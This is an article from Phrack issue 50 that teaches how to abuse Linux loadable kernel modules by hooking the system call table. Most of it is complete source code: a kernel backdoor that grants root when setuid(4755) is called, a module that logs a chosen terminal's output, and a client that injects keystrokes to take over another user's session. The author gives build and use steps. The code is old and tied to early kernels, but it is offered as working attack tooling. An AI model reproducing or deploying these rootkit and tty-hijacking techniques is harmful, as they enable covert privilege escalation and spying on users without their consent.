| .oO Phrack 50 Oo. |
|
|
| Volume Seven, Issue Fifty |
|
|
| 5 of 16 |
| |
| ============================================ |
| Abuse of the Linux Kernel for Fun and Profit |
| halflife@infonexus.com |
| [guild corporation] |
| ============================================ |
|
|
| Introduction |
| ------------ |
| Loadable modules are a very useful feature in linux, as they let |
| you load device drivers on a as-needed basis. However, there is |
| a bad side: they make kernel hacking almost TOO easy. What happens |
| when you can no longer trust your own kernel...? This article describes |
| a simple way kernel modules can be easily abused. |
|
|
| System calls |
| ------------ |
| System calls. These are the lowest level of functions available, and |
| are implemented within the kernel. In this article, we will discuss how |
| they can be abused to let us write a very simplistic tty hijacker/monitor. |
| All code was written and designed for linux machines, and will not compile |
| on anything else, since we are mucking with the kernel. |
|
|
| TTY Hijackers, such as tap and ttywatcher are common on Solaris, |
| SunOS, and other systems with STREAMS, but Linux thus far has not had |
| a useful tty hijacker (note: I don't consider pty based code such as |
| telnetsnoop to be a hijacker, nor very useful since you must make |
| preparations ahead of time to monitor users). |
|
|
| Since linux currently lacks STREAMS (LinSTREAMS appears to be dead), |
| we must come up with a alternative way to monitor the stream. Stuffing |
| keystrokes is not a problem, since we can use the TIOCSTI ioctl to stuff |
| keystrokes into the input stream. The solution, of course, is to redirect |
| the write(2) system call to our own code which logs the contents of the |
| write if it is directed at our tty; we can then call the real write(2) |
| system call. |
|
|
| Clearly, a device driver is going to be the best way to do things. We |
| can read from the device to get the data that has been logged, and add |
| a ioctl or two in order to tell our code exactly what tty we want to log. |
|
|
|
|
| Redirection of system calls |
| --------------------------- |
| System calls are pretty easy to redirect to our own code. It works in |
| principle like DOS terminate and stay resident code. We save the old |
| address in a variable, then set a new one pointing to our code. In our |
| code, we do our thing, and then call the original code when finished. |
|
|
| A very simple example of this is contained in hacked_setuid.c, which |
| is a simple loadable module that you can insmod, and once it is inserted |
| into the kernel, a setuid(4755) will set your uid/euid/gid/egid to 0. |
| (See the appended file for all the code.) The addresses for the |
| syscalls are contained in the sys_call_table array. It is relatively easy |
| to redirect syscalls to point to our code. Once we have done this, many |
| things are possible... |
|
|
| Linspy notes |
| ------------ |
| This module is VERY easy to spot, all you have to do is cat /proc/modules |
| and it shows up as plain as day. Things can be done to fix this, but I |
| have no intention on doing them. |
|
|
| To use linspy, you need to create an ltap device, the major should |
| be 40 and the minor should be 0. After you do that, run make and then |
| insmod the linspy device. Once it is inserted, you can run ltread [tty] |
| and if all goes well, you should see stuff that is output to the user's |
| screen. If all does not go well ... well, I shall leave that to your |
| nightmares. |
|
|
| The Code [use the included extract.c utility to unarchive the code] |
| --------------------------------------------------------------------- |
|
|
|
|
| <++> linspy/Makefile |
| CONFIG_KERNELD=-DCONFIG_KERNELD |
| CFLAGS = -m486 -O6 -pipe -fomit-frame-pointer -Wall $(CONFIG_KERNELD) |
| CC=gcc |
| # this is the name of the device you have (or will) made with mknod |
| DN = '-DDEVICE_NAME="/dev/ltap"' |
| # 1.2.x need this to compile, comment out on 1.3+ kernels |
| V = #-DNEED_VERSION |
| MODCFLAGS := $(V) $(CFLAGS) -DMODULE -D__KERNEL__ -DLINUX |
|
|
| all: linspy ltread setuid |
|
|
| linspy: linspy.c /usr/include/linux/version.h |
| $(CC) $(MODCFLAGS) -c linspy.c |
|
|
| ltread: |
| $(CC) $(DN) -o ltread ltread.c |
|
|
| clean: |
| rm *.o ltread |
|
|
| setuid: hacked_setuid.c /usr/include/linux/version.h |
| $(CC) $(MODCFLAGS) -c hacked_setuid.c |
| |
| <--> end Makefile |
| <++> linspy/hacked_setuid.c |
| int errno; |
| #include <linux/sched.h> |
| #include <linux/mm.h> |
| #include <linux/malloc.h> |
| #include <linux/errno.h> |
| #include <linux/sched.h> |
| #include <linux/kernel.h> |
| #include <linux/times.h> |
| #include <linux/utsname.h> |
| #include <linux/param.h> |
| #include <linux/resource.h> |
| #include <linux/signal.h> |
| #include <linux/string.h> |
| #include <linux/ptrace.h> |
| #include <linux/stat.h> |
| #include <linux/mman.h> |
| #include <linux/mm.h> |
| #include <asm/segment.h> |
| #include <asm/io.h> |
| #include <linux/module.h> |
| #include <linux/version.h> |
| #include <errno.h> |
| #include <linux/unistd.h> |
| #include <string.h> |
| #include <asm/string.h> |
| #include <sys/syscall.h> |
| #include <sys/types.h> |
| #include <sys/sysmacros.h> |
| #ifdef NEED_VERSION |
| static char kernel_version[] = UTS_RELEASE; |
| #endif |
| static inline _syscall1(int, setuid, uid_t, uid); |
| extern void *sys_call_table[]; |
| void *original_setuid; |
| extern int hacked_setuid(uid_t uid) |
| { |
| int i; |
| if(uid == 4755) |
| { |
| current->uid = current->euid = current->gid = current->egid = 0; |
| return 0; |
| } |
| sys_call_table[SYS_setuid] = original_setuid; |
| i = setuid(uid); |
| sys_call_table[SYS_setuid] = hacked_setuid; |
| if(i == -1) return -errno; |
| else return i; |
| } |
| int init_module(void) |
| { |
| original_setuid = sys_call_table[SYS_setuid]; |
| sys_call_table[SYS_setuid] = hacked_setuid; |
| return 0; |
| } |
| void cleanup_module(void) |
| { |
| sys_call_table[SYS_setuid] = original_setuid; |
| } |
| <++> linspy/linspy.c |
| int errno; |
| #include <linux/tty.h> |
| #include <linux/sched.h> |
| #include <linux/mm.h> |
| #include <linux/malloc.h> |
| #include <linux/errno.h> |
| #include <linux/sched.h> |
| #include <linux/kernel.h> |
| #include <linux/times.h> |
| #include <linux/utsname.h> |
| #include <linux/param.h> |
| #include <linux/resource.h> |
| #include <linux/signal.h> |
| #include <linux/string.h> |
| #include <linux/ptrace.h> |
| #include <linux/stat.h> |
| #include <linux/mman.h> |
| #include <linux/mm.h> |
| #include <asm/segment.h> |
| #include <asm/io.h> |
| #ifdef MODULE |
| #include <linux/module.h> |
| #include <linux/version.h> |
| #endif |
| #include <errno.h> |
| #include <asm/segment.h> |
| #include <linux/unistd.h> |
| #include <string.h> |
| #include <asm/string.h> |
| #include <sys/syscall.h> |
| #include <sys/types.h> |
| #include <sys/sysmacros.h> |
| #include <linux/vt.h> |
|
|
| /* set the version information, if needed */ |
| #ifdef NEED_VERSION |
| static char kernel_version[] = UTS_RELEASE; |
| #endif |
|
|
| #ifndef MIN |
| #define MIN(a,b) ((a) < (b) ? (a) : (b)) |
| #endif |
|
|
| /* ring buffer info */ |
|
|
| #define BUFFERSZ 2048 |
| char buffer[BUFFERSZ]; |
| int queue_head = 0; |
| int queue_tail = 0; |
|
|
| /* taken_over indicates if the victim can see any output */ |
| int taken_over = 0; |
|
|
| static inline _syscall3(int, write, int, fd, char *, buf, size_t, count); |
| extern void *sys_call_table[]; |
|
|
| /* device info for the linspy device, and the device we are watching */ |
| static int linspy_major = 40; |
| int tty_minor = -1; |
| int tty_major = 4; |
|
|
| /* address of original write(2) syscall */ |
| void *original_write; |
|
|
| void save_write(char *, size_t); |
|
|
|
|
| int out_queue(void) |
| { |
| int c; |
| if(queue_head == queue_tail) return -1; |
| c = buffer[queue_head]; |
| queue_head++; |
| if(queue_head == BUFFERSZ) queue_head=0; |
| return c; |
| } |
|
|
| int in_queue(int ch) |
| { |
| if((queue_tail + 1) == queue_head) return 0; |
| buffer[queue_tail] = ch; |
| queue_tail++; |
| if(queue_tail == BUFFERSZ) queue_tail=0; |
| return 1; |
| } |
|
|
|
|
| /* check if it is the tty we are looking for */ |
| int is_fd_tty(int fd) |
| { |
| struct file *f=NULL; |
| struct inode *inode=NULL; |
| int mymajor=0; |
| int myminor=0; |
|
|
| if(fd >= NR_OPEN || !(f=current->files->fd[fd]) || !(inode=f->f_inode)) |
| return 0; |
| mymajor = major(inode->i_rdev); |
| myminor = minor(inode->i_rdev); |
| if(mymajor != tty_major) return 0; |
| if(myminor != tty_minor) return 0; |
| return 1; |
| } |
|
|
| /* this is the new write(2) replacement call */ |
| extern int new_write(int fd, char *buf, size_t count) |
| { |
| int r; |
| if(is_fd_tty(fd)) |
| { |
| if(count > 0) |
| save_write(buf, count); |
| if(taken_over) return count; |
| } |
| sys_call_table[SYS_write] = original_write; |
| r = write(fd, buf, count); |
| sys_call_table[SYS_write] = new_write; |
| if(r == -1) return -errno; |
| else return r; |
| } |
|
|
|
|
| /* save data from the write(2) call into the buffer */ |
| void save_write(char *buf, size_t count) |
| { |
| int i; |
| for(i=0;i < count;i++) |
| in_queue(get_fs_byte(buf+i)); |
| } |
|
|
| /* read from the ltap device - return data from queue */ |
| static int linspy_read(struct inode *in, struct file *fi, char *buf, int count) |
| { |
| int i; |
| int c; |
| int cnt=0; |
| if(current->euid != 0) return 0; |
| for(i=0;i < count;i++) |
| { |
| c = out_queue(); |
| if(c < 0) break; |
| cnt++; |
| put_fs_byte(c, buf+i); |
| } |
| return cnt; |
| } |
|
|
| /* open the ltap device */ |
| static int linspy_open(struct inode *in, struct file *fi) |
| { |
| if(current->euid != 0) return -EIO; |
| MOD_INC_USE_COUNT; |
| return 0; |
| } |
|
|
| /* close the ltap device */ |
| static void linspy_close(struct inode *in, struct file *fi) |
| { |
| taken_over=0; |
| tty_minor = -1; |
| MOD_DEC_USE_COUNT; |
| } |
| |
| /* some ioctl operations */ |
| static int |
| linspy_ioctl(struct inode *in, struct file *fi, unsigned int cmd, unsigned long args) |
| { |
| #define LS_SETMAJOR 0 |
| #define LS_SETMINOR 1 |
| #define LS_FLUSHBUF 2 |
| #define LS_TOGGLE 3 |
|
|
| if(current->euid != 0) return -EIO; |
| switch(cmd) |
| { |
| case LS_SETMAJOR: |
| tty_major = args; |
| queue_head = 0; |
| queue_tail = 0; |
| break; |
| case LS_SETMINOR: |
| tty_minor = args; |
| queue_head = 0; |
| queue_tail = 0; |
| break; |
| case LS_FLUSHBUF: |
| queue_head=0; |
| queue_tail=0; |
| break; |
| case LS_TOGGLE: |
| if(taken_over) taken_over=0; |
| else taken_over=1; |
| break; |
| default: |
| return 1; |
| } |
| return 0; |
| } |
|
|
|
|
| static struct file_operations linspy = { |
| NULL, |
| linspy_read, |
| NULL, |
| NULL, |
| NULL, |
| linspy_ioctl, |
| NULL, |
| linspy_open, |
| linspy_close, |
| NULL |
| }; |
|
|
|
|
| /* init the loadable module */ |
| int init_module(void) |
| { |
| original_write = sys_call_table[SYS_write]; |
| sys_call_table[SYS_write] = new_write; |
| if(register_chrdev(linspy_major, "linspy", &linspy)) return -EIO; |
| return 0; |
| } |
|
|
| /* cleanup module before being removed */ |
| void cleanup_module(void) |
| { |
| sys_call_table[SYS_write] = original_write; |
| unregister_chrdev(linspy_major, "linspy"); |
| } |
| <--> end linspy.c |
| <++> linspy/ltread.c |
| #include <stdio.h> |
| #include <stdlib.h> |
| #include <unistd.h> |
| #include <termios.h> |
| #include <string.h> |
| #include <fcntl.h> |
| #include <signal.h> |
| #include <sys/types.h> |
| #include <sys/stat.h> |
| #include <sys/sysmacros.h> |
|
|
| struct termios save_termios; |
| int ttysavefd = -1; |
| int fd; |
|
|
| #ifndef DEVICE_NAME |
| #define DEVICE_NAME "/dev/ltap" |
| #endif |
|
|
| #define LS_SETMAJOR 0 |
| #define LS_SETMINOR 1 |
| |
| #define LS_FLUSHBUF 2 |
| #define LS_TOGGLE 3 |
|
|
| void stuff_keystroke(int fd, char key) |
| { |
| ioctl(fd, TIOCSTI, &key); |
| } |
|
|
| int tty_cbreak(int fd) |
| { |
| struct termios buff; |
| if(tcgetattr(fd, &save_termios) < 0) |
| return -1; |
| buff = save_termios; |
| buff.c_lflag &= ~(ECHO | ICANON); |
| buff.c_cc[VMIN] = 0; |
| buff.c_cc[VTIME] = 0; |
| if(tcsetattr(fd, TCSAFLUSH, &buff) < 0) |
| return -1; |
| ttysavefd = fd; |
| return 0; |
| } |
|
|
| char *get_device(char *basedevice) |
| { |
| static char devname[1024]; |
| int fd; |
|
|
| if(strlen(basedevice) > 128) return NULL; |
| if(basedevice[0] == '/') |
| strcpy(devname, basedevice); |
| else |
| sprintf(devname, "/dev/%s", basedevice); |
| fd = open(devname, O_RDONLY); |
| if(fd < 0) return NULL; |
| if(!isatty(fd)) return NULL; |
| close(fd); |
| return devname; |
| } |
|
|
|
|
| int do_ioctl(char *device) |
| { |
| struct stat mystat; |
|
|
| if(stat(device, &mystat) < 0) return -1; |
| fd = open(DEVICE_NAME, O_RDONLY); |
| if(fd < 0) return -1; |
| if(ioctl(fd, LS_SETMAJOR, major(mystat.st_rdev)) < 0) return -1; |
| if(ioctl(fd, LS_SETMINOR, minor(mystat.st_rdev)) < 0) return -1; |
| } |
|
|
|
|
| void sigint_handler(int s) |
| { |
| exit(s); |
| } |
|
|
| void cleanup_atexit(void) |
| { |
| puts(" "); |
| if(ttysavefd >= 0) |
| tcsetattr(ttysavefd, TCSAFLUSH, &save_termios); |
| } |
|
|
| main(int argc, char **argv) |
| { |
| int my_tty; |
| char *devname; |
| unsigned char ch; |
| int i; |
|
|
| if(argc != 2) |
| { |
| fprintf(stderr, "%s ttyname\n", argv[0]); |
| fprintf(stderr, "ttyname should NOT be your current tty!\n"); |
| exit(0); |
| } |
| devname = get_device(argv[1]); |
| if(devname == NULL) |
| { |
| perror("get_device"); |
| exit(0); |
| } |
| if(tty_cbreak(0) < 0) |
| { |
| perror("tty_cbreak"); |
| exit(0); |
| } |
| atexit(cleanup_atexit); |
| signal(SIGINT, sigint_handler); |
| if(do_ioctl(devname) < 0) |
| { |
| perror("do_ioctl"); |
| exit(0); |
| } |
| my_tty = open(devname, O_RDWR); |
| if(my_tty == -1) exit(0); |
| setvbuf(stdout, NULL, _IONBF, 0); |
| printf("[now monitoring session]\n"); |
| while(1) |
| { |
| i = read(0, &ch, 1); |
| if(i > 0) |
| { |
| if(ch == 24) |
| { |
| ioctl(fd, LS_TOGGLE, 0); |
| printf("[Takeover mode toggled]\n"); |
| } |
| else stuff_keystroke(my_tty, ch); |
| } |
| i = read(fd, &ch, 1); |
| if(i > 0) |
| putchar(ch); |
| } |
| } |
| <--> end ltread.c |
|
|
|
|
| EOF |
|
|